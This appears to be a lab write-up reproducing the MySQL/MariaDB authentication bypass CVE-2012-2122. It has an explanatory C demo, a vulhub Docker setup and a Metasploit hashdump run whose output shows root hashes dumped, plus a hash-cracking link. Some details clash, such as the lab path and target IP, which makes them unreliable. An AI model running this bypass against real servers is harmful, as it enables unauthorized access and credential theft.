Vulnerability overview

When a client connects to MariaDB/MySQL, the supplied password is compared against the expected correct one. Because of incorrect handling of the comparison result, MySQL can treat the two passwords as identical even when memcmp() returns a non-zero value. According to the advisory, roughly one attempt in 256 gets through by chance.

Affected versions (the advisory states that the following releases are not affected):

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
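The root cause described above is a narrowing conversion: check_scramble() returned memcmp()'s int result through my_bool (a plain char), so a non-zero result that is a multiple of 256 became 0 and passed as a match. The following is an added example, not MySQL's own code; wide_memcmp() is a constructed model of an optimised memcmp() that returns word differences, and the 20-byte hash is made up.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20

/* In the vulnerable releases my_bool was a plain char, and check_scramble()
 * returned memcmp()'s int result through it. Any non-zero result that is a
 * multiple of 256 is truncated to 0 and read as "passwords match". */
typedef char my_bool;

/* Constructed model of an optimised memcmp(): compares 16-bit little-endian
 * words (n assumed even) and returns their numeric difference, so a mismatch
 * in the high byte of a word yields a multiple of 256. Real libc memcmp()
 * only promises the sign; this model just makes the truncation visible. */
static int wide_memcmp(const uint8_t *a, const uint8_t *b, size_t n)
{
    for (size_t i = 0; i < n; i += 2) {
        int wa = a[i] | (a[i + 1] << 8);
        int wb = b[i] | (b[i + 1] << 8);
        if (wa != wb)
            return wa - wb;
    }
    return 0;
}

/* Vulnerable shape: the int result is narrowed to char before being tested. */
static my_bool check_scramble_vulnerable(const uint8_t *expected, const uint8_t *computed)
{
    return wide_memcmp(expected, computed, SHA1_HASH_SIZE);
}

/* Fixed shape: test the int for non-zero first, so only 0 or 1 is returned. */
static my_bool check_scramble_fixed(const uint8_t *expected, const uint8_t *computed)
{
    return wide_memcmp(expected, computed, SHA1_HASH_SIZE) != 0;
}

/* Counts how many single-byte corruptions of a constructed hash the given
 * checker accepts (returns 0 for); a correct checker must accept none. */
static int count_false_accepts(my_bool (*check)(const uint8_t *, const uint8_t *))
{
    static const uint8_t expected[SHA1_HASH_SIZE] = {  /* constructed value */
        0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0x10, 0x32,
        0x54, 0x76, 0x98, 0xba, 0xdc, 0xfe, 0x11, 0x22, 0x33, 0x44 };
    uint8_t wrong[SHA1_HASH_SIZE];
    int accepted = 0;
    for (size_t pos = 0; pos < SHA1_HASH_SIZE; pos++) {
        for (int delta = 1; delta < 256; delta++) {
            memcpy(wrong, expected, SHA1_HASH_SIZE);
            wrong[pos] = (uint8_t)(expected[pos] + delta);  /* never equal */
            if (check(expected, wrong) == 0)
                accepted++;
        }
    }
    return accepted;
}

int main(void)
{
    printf("vulnerable: %d false accepts\n", count_false_accepts(check_scramble_vulnerable));
    printf("fixed:      %d false accepts\n", count_false_accepts(check_scramble_fixed));
    return 0;
}
```

With this model every corruption of a high byte (10 positions x 255 values) slips through the vulnerable checker, while the fixed checker rejects all 5100 wrong hashes; the real 1/256 rate depends on how often the platform's memcmp() returns such a multiple.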

Lab environment

Enter /vulhub/phpmyadmin/CVE-2018-12613

docker-compose up -d

zss@zss > ~/漏洞复现/vulhub/mysql/CVE-2012-2122>>> sudo docker-compose up -d           
[sudo] zss 的密码:
Starting cve-2012-2122_mysql_1 ... done

Vulnerability verification

Start msfconsole

msf6 > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump 
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 60.2.185.218
RHOSTS => 60.2.185.218
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set THREADS 10 # 设置线程
THREADS => 10
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.0.106:3306 - 192.168.0.106:3306 The server allows logins, proceeding with bypass test
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 10% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 20% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 30% complete
[*] 192.168.0.106:3306 - 192.168.0.106:3306 Authentication bypass is 40% complete
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Successfully bypassed authentication after 411 attempts. URI: mysql://root:Egvoq@192.168.0.106:3306
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.0.106:3306 - 192.168.0.106:3306 Hash Table has been saved: /home/zss/.msf4/loot/20211230110548_default_192.168.0.106_mysql.hashes_615289.txt
[*] 192.168.0.106:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

https://www.cmd5.com/
